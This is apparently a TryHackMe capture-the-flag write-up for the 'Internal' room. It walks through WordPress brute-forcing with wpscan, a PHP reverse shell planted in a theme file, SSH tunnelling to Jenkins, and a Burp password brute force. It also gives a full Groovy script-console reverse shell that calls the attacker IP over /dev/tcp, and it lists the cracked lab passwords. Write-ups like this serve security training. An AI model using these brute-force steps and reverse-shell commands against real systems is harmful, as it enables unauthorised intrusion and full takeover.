###### tags: `TryHackMe OffensiveSecurity AdvancedExploitation` # Internal :::info I have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in seven days. The client requests that an engineer conducts an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test). The client has asked that I secure two flags (no location provided) as proof of exploitation: User.txt Root.txt ::: ## Reconnaissance ### Ports enumeration with nmap  Ports ssh and http are open. Since there is a web server running let's enumerate the repertories with Gobuster :  We can see that the web server use wordpress. I also notice that the IP given try to connect to the domain name `internal.thm`  I choose to add the domain name associated to the IP to my `/etc/hosts` file.  Browsing the web server i found the wordpress login form  I decided to use a tool called `wpscan`to enumerate wordpress and try to find any credentials : ``` wpscan --url 10.10.1.198/blog -e u -e for enumerating u for enumerating users ```  After the user enumeration,We can see `admin` is the administrator username :  Let's use this info to retreive his password always with `wpscan` : ``` wpscan --url 10.10.1.198/blog -U admin -P /usr/share/wordlists/rockyou.txt -U to specify the user we found out -P to specify a wordlist used for brute forcing the password ```   We have now the all the elements that can allow us to enter the wordpress admin page. ``` Username : admin Password : my2boys ```  :::success PINGO !!! ::: ## Gaining initial access Now let's manage to find a way to gain an initial access. I tried to past a php reverse shell in a php file of the dashboard. To do it i investigate the Dashboard and saw a php page in theme editor. I delete its content and paste my php reverse shell :  To trigger it i started a netcat handler and navigate to this url : `10.10.1.198/blog/wp-content/themes/twentyseventeen/404.php`  :::success I gain an initial access. ::: ## Privilege escalations After gaining an initial shell my goal is to gain enough privileges and be the root user.  While i was enumerating some directories i found out a file called `wp-save.txt` in the `/opt` directory. And to my amazement, the file contained *aubreanna* credenials.  We saw earlier in the reconnaissance step that the ssh port was opened. Let's use aubreanna credentials to connect to the server.  :::success I am now the user aubreanna. ::: Let's manage to elevate our privileges again and be **root**. In aubreanna home directory i find a file called `jenkins.txt` and here the content of the file :  So we can guess jenkins is running on port 8080. Let's create a tunnel to access the service from my local machine. ``` ssh -L 8080:localhost:8080 aubreanna@10.10.1.198 ```  Now from our browser let's access to the jenkins portal :  I try to brute force the form with Burpsuite :  I choose the `rockyou.txt` wordlist. In the figure above we can see that the length of the `spongebob` password is different from the others. Considering the differences in size between response header sizes we can determine the correct password from an incorrect one and successfully log in. :::success Correct password : spongebob ::: After log in the jenkins Dashbord i found several tools like the `script console one` :  I will use the tool to run a reverse shell and have root privileges. I find on internet the commands to run the bash shell : ``` r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.11.33.232/1235;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() ```  After running the script i had a reverse shell in my netcat handler waiting. And like previously, i find in the `/opt` directory the **root password**.  :::success user : root password : tr0ub13guM!@#123 ::: I use ssh to connect to the machine with these credentials.  :::success I HAVE NOW ROOT PRIVILEGES. :::